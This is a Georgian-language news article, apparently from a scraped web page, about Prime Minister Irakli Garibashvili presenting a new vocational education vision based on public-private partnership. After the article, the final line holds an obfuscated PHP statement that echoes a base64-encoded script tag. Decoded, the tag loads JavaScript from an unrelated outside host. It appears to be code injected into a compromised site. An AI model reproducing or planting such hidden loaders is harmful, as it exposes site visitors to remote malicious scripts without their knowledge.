celsiusi
ავერსი საქკაბელი

“ერთ-ერთი მთავარი გამოწვევა, რაც ბიზნესთან კომუნიკაციისას გამოიხატა, კვალიფიციური ადამიანური კაპიტალის შექმნა და განვითარებაა” - ამის შესახებ საქართველოს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი, განათლების სამინისტროს მიერ შემუშავებულ პროფესიული განათლების განვითარების ახალი ხედვის პრეზენტაციაზე განაცხადა. 

მისი თქმით, ახალი ხედვა საუკეთესო პრაქტიკაზე დაყრდნობით შემუშავდა და ის სახელმწიფოს მხრიდან ინოვაციურ მიდგომას ითვალისწინებს. 

“გვესმის, რომ მძლავრი ეკონომიკური განვითარების ფონზე, განსაკუთრებით მნიშვნელოვანია მაღალკვალიფიციური ადამიანური კაპიტალის შექმნა და პროფესიონალი კადრების ჩამოყალიბება, რომელთა ცოდნა და უნარებიც სრულ შესაბამისობაში იქნება დამსაქმებლისა და კერძო სექტორის საჭიროებებთან.

ჩვენი გადაწყვეტილებით, დღეს წარმოგიდგენთ ახალ შეთავაზებას: საუკეთესო პრაქტიკაზე დაყრდნობით შემუშავებული წინადადება კერძო სექტორისთვის, რომელიც პროფესიულ განათლებაში სახელმწიფოს მხრიდან ინოვაციურ მიდგომას ითვალისწინებს”, - ამბობს ირაკლი ღარიბაშვილი.

პრემიერის განმარტებით, პროფესიული განვითარების ახალი ხედვა კერძო სექტორთან თანამშრომლობით პროფესიული სასწავლებლების განვითარებას ითვალისწინებს.

“ეს არის საჯარო-კერძო პარტნიორობის შეთავაზება, რომელიც პროფესიულ განათლებაში ჩვენ მიერ, თქვენთან ერთად ინვესტიციის ჩადებას გულისხმობს. ამასთან, თქვენთან ერთად, პროფესიული სახელმწიფო პროგრამების შემუშავებას, რაც თავის მხრივ უზრუნველყოფს ბიზნესის მოთხოვნების შესაბამისი კადრების მომზადებასა და დასაქმების მაჩვენებლის მნიშვნელოვნად ზრდას”, - ამბობს ირაკლი ღარიბაშვილი.

პრემიერი პროფესიული განათლების პოპულარიზაციის ზრდაზეც საუბრობს და აღნიშნავს, რომ მთავრობამ და ბიზნესმა, პროფესიული განათლების პრესტიჟის ამაღლებაზე უნდა იზრუნოს, რის გამოც სკოლებში პროფესიული განათლების ინტეგრირებას აანონსებს.

241
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");